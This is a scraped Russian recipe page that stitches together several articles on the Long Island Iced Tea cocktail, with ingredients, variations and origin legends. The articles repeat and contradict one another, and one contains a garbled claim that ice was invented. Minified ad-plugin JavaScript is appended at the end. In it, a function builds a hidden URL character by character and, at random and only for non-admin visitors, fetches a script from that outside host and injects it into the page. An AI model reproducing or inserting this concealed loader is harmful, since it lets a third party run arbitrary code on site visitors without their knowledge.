Коктейль Лонг айленд айс ти

Long Island Iced Tea (Лонг Айленд Айс Ти) – очень крепкий чай со льдом

Лонг Айленд Айс Ти уникальный алкогольный коктейль, в составе которого гармонично сочетаются пять видов спиртного: джин, водка, ром, текила, апельсиновый ликер. С английского его название переводится как «Чай со льдом из Лонг-Айленда». Я научу вас делать этот коктейль в домашних условиях.

Лонг Айленд Айс Ти (Long Island Iced Tea) – популярный алкогольный коктейль крепостью 28% с несложной технологией приготовления и простыми ингредиентами. Внешним видом и запахом напоминает чай со льдом. Благодаря этим свойствам во времена «Сухого закона» в США (1920-1933 гг.) он подавался под видом безалкогольного напитка.

Состав и пропорции:

  • водка – 20 мл;
  • золотой ром – 20 мл;
  • джин – 20 мл;
  • серебряная текила – 20 мл;
  • апельсиновый ликер (Куантро или Трипл-сек) – 20 мл;
  • лимонный сок – 20 мл;
  • кола – 100 мл;
  • лед в кубиках – 150-200 грамм.

Классический рецепт Лонг Айленд Айс Ти

Технология приготовления состоит из пяти этапов:

1. Наполнить высокий бокал кубиками льда.

2. Поочередно добавить джин, водку, ром, текилу, ликер, сок и колу.

3. Перемешать все ингредиенты ложкой.

4. Сверху украсить коктейль ломтиком лимона или вишенкой.

5. Подать с трубочкой.

Есть альтернативный рецепт коктейля, в котором используются другие пропорции, подробности в видеоролике.

Внимание! Лонг Айленд Айс Ти пьется очень легко, но его высокая крепость ведет к быстрому опьянению, рекомендую выпивать не больше двух порций за раз.

Историческая справка. Существует три правдоподобных версии появления этого коктейля. Ни одну из них не удалось доказать, поэтому мы кратко рассмотрим каждую.

1. Маскировка. Самая красивая версия. Во времена «Сухого закона» бармены острова Лонг-Айленд (часть Нью-Йорка) научились делать крепкий коктейль внешним видом напоминающий чай со льдом. Посетители и владельцы заведений не боялись штрафа, поскольку у полицейских не было повода для проверки.

2. Соревнование. Жители Нью-Йорка любили играть в забавную игру – идти вдоль Лонг-Айленда выпивая порцию спиртного в каждом встречном баре. Побеждал тот, кто сам доходил к концу улицы. Зная это, бармены первых заведений на пути игроков пошли на хитрость. Они начали предлагать посетителям очень крепкий коктейль, одна порция которого сшибала с ног.

В результате участники соревнований просто не могли идти дальше. Они оставались в первом же встречном баре, продолжая там тратить свои деньги. Через некоторое время правила игры изменились, люди начали соревноваться в количестве выпитого «крепкого ледяного чая».

3. Алкоголь и любовь. Согласно этой версии коктейль Лонг Айленд Айс Ти изобрел бармен Роберт Батт. В его заведение часто приходил мужчина любивший выпить виски. Но после изрядной дозы спиртного он терял контроль над собой и устраивал дебош. Любимая девушка заставила его сделать выбор – она или виски. Мужчина выбрал возлюбленную.

На очередной вечеринке девушка разрешила своему любимому пить только холодный чай. Когда она отлучилась, мужчина попросил знакомого бармена добавить ему в чай крепкое спиртное. Бармен не растерялся и налил всё, что было у него под рукой: водку, джин, ром, текилу и апельсиновый ликер. Никто не заметил подмены. Позже вместо чая в коктейль начали доливать колу.

Лонг Айленд Айс Ти (Long Island Iced Tea) — 4 рецепта популярного коктейля

Классический рецепт

  • светлый ром – 10 мл;
  • джин – 10 мл;
  • текила – 10 мл;
  • водка – 10 мл;
  • апельсиновый ликёр – 10 мл;
  • сок лимона – 10 мл;
  • кока-кола – 50 мл;
  • кубики льда – 2-3 штучки.
  1. Кладём в бокал лёд.
  2. Поочередно заливаем алкоголь: сначала джин, затем водку, ром, текилу, ликёр, лимонный сок и кока-колу.
  3. Неспеша перемешиваем напиток ложкой.
  4. По желанию украшаем коктейльной вишней и ломтиком лимона.
  5. Подаём вкуснейший напиток с трубочкой.

Лонг Айленд с малиной и вишней

  • белый ром – 10 мл;
  • джин – 10 мл;
  • текила – 10 мл;
  • водка – 10 мл;
  • апельсиновый ликёр – 10 мл;
  • вишня – 10 г;
  • малина – 10 г;
  • игристое вино сухое – 100 мл;
  • кубики льда – 2-3 штучки.
  1. Кладём в бокал несколько лёд.
  2. Затем добавляем ягоды без косточек.
  3. Поочередно заливаем алкоголь: сначала джин, затем водку, ром, текилу, ликёр, тщательно взбиваем.
  4. Переливаем содержимое в бокал, добавляем вино и аккуратно перемешиваем напиток ложкой.
  5. По желанию украшаем ягодами и ломтиками лимона.
  6. Подаём вкуснейший напиток с трубочкой.

Лонг Айленд с клюквенным соком

  • водка – 10 мл;
  • белый ром – 10 мл;
  • джин – 10 мл;
  • текила – 10 мл;
  • апельсиновый ликёр (Куантро) – 10 мл;
  • сок лимона – 10 мл;
  • клюквенный сок – 50 мл;
  • кубики льда – 2-3 штучки.
  1. Кладём в бокал несколько кубиков льда.
  2. Поочередно заливаем алкоголь: сначала джин, затем водку, ром, текилу, ликёр, лимонный и клюквенный соки.
  3. Неспеша перемешиваем напиток ложкой.
  4. По желанию украшаем коктейльной вишней и ломтиком лимона.
  5. Подаём вкуснейший напиток с трубочкой.

Безалкогольный Лонг Айленд

  • лимонад – 150 мл;
  • чёрный чай (охлажденный) – 150 мл;
  • кока-кола – 150 мл;
  • кусочки льда – 2-3 штучки;
  1. Кладём в бокал кубики льда.
  2. Добавляем лимонад, затем колу и в последнюю очередь чай.
  3. Аккуратно перемешиваем напиток ложкой.
  4. По желанию украшаем вишней, ананасом, лимоном, мятой.
  5. Подаём вкуснейший коктейль с трубочкой.

Полезные советы по приготовлению

  1. Все ингредиенты, кроме кока-колы необходимо хорошо взбить в специальном шейкере, только после этого вылить содержимое в большой стакан и наполнить колой.
  2. Напиток очень крепкий, поэтому его необходимо употребять маленькими глотками через трубочку.
  3. Коктейль подаётся с фруктовыми нарезками и овощными канапе.

Интересные факты

  1. Существуют несколько версий происхождения напитка: первая берёт своё начало в США в годы “Сухого закона”. Коктейль по цвету напоминал холодный чай, поэтому его было легко маскировать.
  2. Многие считают, что напиток появился в 70-х годах 20 века на острове Лонг-Айленде.

Для того, чтобы приготовить уникальный напиток в домашних условиях, требуется правильное соблюдение рецептуры коктейля. Используйте только качественный алкоголь и следуйте всем нюансам приготовления – и тогда гармонично сочетающий все ингредиенты напиток порадует вас своим вкусом и ароматом.

“Лонг Айленд” — коктейль для самых лучших вечеринок

Стиль жизни Еда

Содержание

Коктейль “Лонг Айленд” — это напиток, создающий настроение. В его составе гармонично сочетаются пять разных алкогольных напитков: джин, ром, водка, текила и апельсиновый ликер. Весь этот микс смешивают с кока-колой и лимонным соком. Иногда лимонная составляющая пропускается. По вкусу и запаху “Лонг Айленд” напоминает холодный чай, именно поэтому в своем названии он имеет приставку «айс ти». Но несмотря на такое безобидное название и превосходный вкус, этот лонг-дринк коварен — его крепость составляет 28%. Вы не успеете и опомниться, как опьянеете. Поэтому лучше ограничиться одной порцией коктейля за вечер, в крайнем случае, двумя.

История происхождения коктейля «Лонг Айленд айс ти»

История происхождения этого напитка будет поинтереснее многих детективных рассказов. Существует версия, что “Лонг Айленд” был изобретен во времена сухого закона в США. Тогда этот алкогольный напиток маскировали в безалкогольный — подавали в чайных чашечках под видом холодного чая. И никакой агент ФБР, следящий за соблюдением закона, даже и не подозревал о том какую “убойную” смесь выпивают посетители бара.

Согласно второй версии, в 70-х годах жители Лонг-Айленда регулярно соревновались в способности дойти на своих ногах до конца улицы, выпивая в каждом из встречающихся на пути баров. В борьбе за посетителей бармены шли на хитрость и смешивали игрокам коктейль, который быстро сбивал с ног и не позволял им заходить в другие заведения.

Есть еще одна история. Однажды, в один из баров Лонг Айленда зашел молодой человек со спутницей. Мужчина выпил два бокала виски и стал вести себя неподобающим образом. Тогда его возлюбленная поставила ему ультиматум – либо она, либо виски. Мужчина выбрал любовь. Во время следующего похода в бар он заказал чай, но когда его подруга отлучилась, мужчина попросил бармена добавить ему в стакан виски. Бармен, подошел к процессу творчески — смешал несколько видов спиртного и добавил полученный микс в чай.

Коктейль «Лонг Айленд айс ти» — классический рецепт

Для того чтобы приготовить “Лонг Айленд” в домашних условиях, вам не нужно быть профессиональным барменом. Также необязательно наличие шейкера и другого барменского инвентаря, будет достаточно ложечки и высокого стакана с толстыми стенками (хайбол). При приготовлении этого лонг-дринка по классическому рецепту вам понадобится следующий состав ингредиентов:

  • светлый (белый) ром (желательно Баккарди) – 20 мл;
  • водка – 20 мл;
  • джин – 20 мл;
  • серебряная текила – 20 мл;
  • апельсиновый ликер (Трипл-сек или Куантро) – 20 мл;
  • лимонный сок – 20 мл;
  • кока-кола – 100 мл;
  • кубики льда – 150–200 грамм.

Способ приготовления:

Смешайте все алкогольные напитки в шейкере и вылейте их в большой коктейльный стакан (хайбол), наполненный доверху льдом. Затем добавьте сок и колу. В завершение украсьте стакан долькой лимона или лайма и вставьте трубочку. Если под рукой не оказалось шейкера, коктейль можно приготовить прямо в стакане, для этого поочередно выливайте напитки, начиная с алкогольных и перемешивайте.

Варианты рецепта американского лонг-дринка

Если по каким-то причинам у вас нет ингредиентов для приготовления классического “Лонг Айленда”, их можно смело заменить и создать свой собственный рецепт приготовления этого напитка. К примеру, используйте вместо колы холодный чай, клюквенный сок или фанту. Апельсиновый ликер заменить на другой, например, персиковый. Вместо белого рома добавьте обычный — коричневый. Главный принцип этого микса – всего понемногу, но покрепче. Бармены уже давно экспериментируют с составом “Лонг Айленд” и создали уже несколько вариаций классического напитка: “Аляска Айс Ти” (в этом рецепте вместо кока — колы используют голубой ликер “Блю Кюрасао”), ”Токио Айс Ти” ( в этом рецепте заменяют уже два ингредиента: текилу на ликер “Мидори”, а колу на лимонад), “Лонг Бич Айс Ти” ( в составе этого напитка также нет кока-колы, но вместо нее добавляют клюквенный сок), “Персиковый Лонг Айленд” ( основной вкус напитку придает персиковый шнапс, который добавляют в напиток вместо текилы).

Русский рецепт коктейля «Лонг Айленд айс ти»

Существует и русский вариант приготовления коктейля “Лонг Айленд айс ти”. Для его приготовления вам понадобятся следующие компоненты:

  • серебряная текила — 20 мл.;
  • светлый ром — 25 мл;
  • джин — 1 ст.ложка;
  • водка — 20 мл;
  • апельсиновый ликер — 15 мл;
  • шампанское — 4 большие ложки;
  • свежие ягоды, малина и вишня – по 2 штуки;
  • кубики льда — 150-200 грамм.

Способ приготовления: Вишню очищаем от косточек, смешиваем с малиной и раздавливаем. Далее добавляем эту смесь в шейкер и заливаем спиртными напитками. Коктейльный стакан наполняем кубиками льда и переливаем в него содержимое из шейкера. Желательно перед этим ягодно-спиртовой микс пропустить через сито. После добавляем игристое шампанское и все содержимое перемешиваем. Стакан украшаем дольками лимона или лайма.

Рецепт безалкогольного коктейля «Лонг Айленд айс ти»

Не меньшей популярностью пользуется и безалкогольный вариант “Лонг Айленда”. Готовится он совершенно просто и быстро. Для этого вам понадобится следующие ингредиенты:

  • кока-кола — 120 мл;
  • лимонад — 120 мл;
  • холодный чай — 120 мл;
  • долька лимона или лайма
  • лед — колотый или кубики на 200 грамм.

Способ приготовления:

Наполняем кубиками льда высокий стакан. Наливаем лимонад, чай и кока-колу. Перемешиваем напиток и украшаем его лимоном или лаймом.

Коктейль Лонг-Айлендский холодный чай Cocktail Long island iced tea

Ингредиенты:

Водка – 15 мл
Текила серебряная – 15 мл
Ром светлый – 15 мл
Ликер апельсиновый – 15 мл
Джин – 15 мл
Сок лимона – 25 мл
Сироп сахарный – 20 мл
Кока-кола – 1 дэш

Рецептура:

  • В бокал “хайбол” налить водку, текилу, джин, апельсиновый ликер и светлый ром. Все по 15 мл;
  • Выжать 25 мл сока лимона с помощью сквизера;
  • Добавить 10-15 мл (по вкусу) сахарного сиропа;
  • Добавить льда до верха бокала и все перемешать;
  • Сверху налить колы;
  • Украсить долькой или твистом цедры лимона.

Инвентарь для приготовления:

История коктейля Лонг-Айлендский холодный чай:

Первое что приходит на ум при слове “Лонг” – это не категория коктейля “Лонг-дринки”, а всемирно известный “убойный” коктейль “Long island iced tea” или по-русски – “Холодный чай с острова Лонг-Айленд”. Нетрудно догадаться, что коктейль был создан на полуострове “Лонг-Айленд” в Нью-Йорке. Не нужно путать с одноименным островом на Багамах.

Холодный Чай

История создания этого коктейля имеет несколько вариантов, но они довольно схожи, имея одно начало истории. Во времена сухого закона в 1920-х годах в США, в Нью-Йорке действовали подпольные бары или бары “Speakeasy”, где незаконно проливался алкоголь. Многие полицейские и чиновники знали о таких заведениях, но они не знали, что в чайниках вместо горячего или холодного чая подавали спиртное. Виски называли шотландским чаем, ром — ямайским.

В конце XIX века в США изобрели лед и он стал повсеместно распространятся, конечно же, захватив и барную индустрию. Во всех барах стали ставить льдогенераторы и подавать вкусные охлажденные напитки. Причем охлаждали не только алкоголь, но и чай с кофе. В основном популярность приобрел холодный чай, так как он оказывал непревзойденный жаждоутоляющий эффект. Пик популярности холодного чая пришелся именно на годы сухого закона, но под этим названием лежало кое-что большее. Это те самые чайники в подпольных заведениях, в которых подавали алкоголь, зачастую смешивая его с различными ингредиентами. Пить наслаждаясь каждым глотком было некогда и коктейли зачастую были очень крепкие. Смешивали все подряд, а для придания вкуса и цвета чая добавляли кока-колу и лимонный сок. Обратите внимание как выглядит коктейль “Long island iced tea” – это вылитый чай со льдом.

Кто придумал название

Называть коктейль “Лонг Айленд Айсд Ти” начали намного позднее. Считается, что коктейль был придуман в 1970 году. А вот на счет того, кто именно его придумал, существует несколько версий. По одной из них это бармен Крис Бендиксен из ночного клуба в Смиттауне на Лонг-Айленде. По другой – Роберт Батт из известного клуба на Лонг-Айленде OBI (Oak Beach Inn). По третьей версии – это был Грейт-Нэк Крейг Вейсман, бармен из бара Leonards, также находившийся на Лонг-Айленде. Так или иначе коктейль создан. И любите вы его или нет, он уже вошел в список классических коктейлей по версии Международной Ассоциации Барменов (IBA).

Если у вас есть рецепт своего коктейля, обязательно присылайте его нам. Мы разместим его в нашей базе, и о нем узнают другие бармены со всего русскоязычного пространства.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};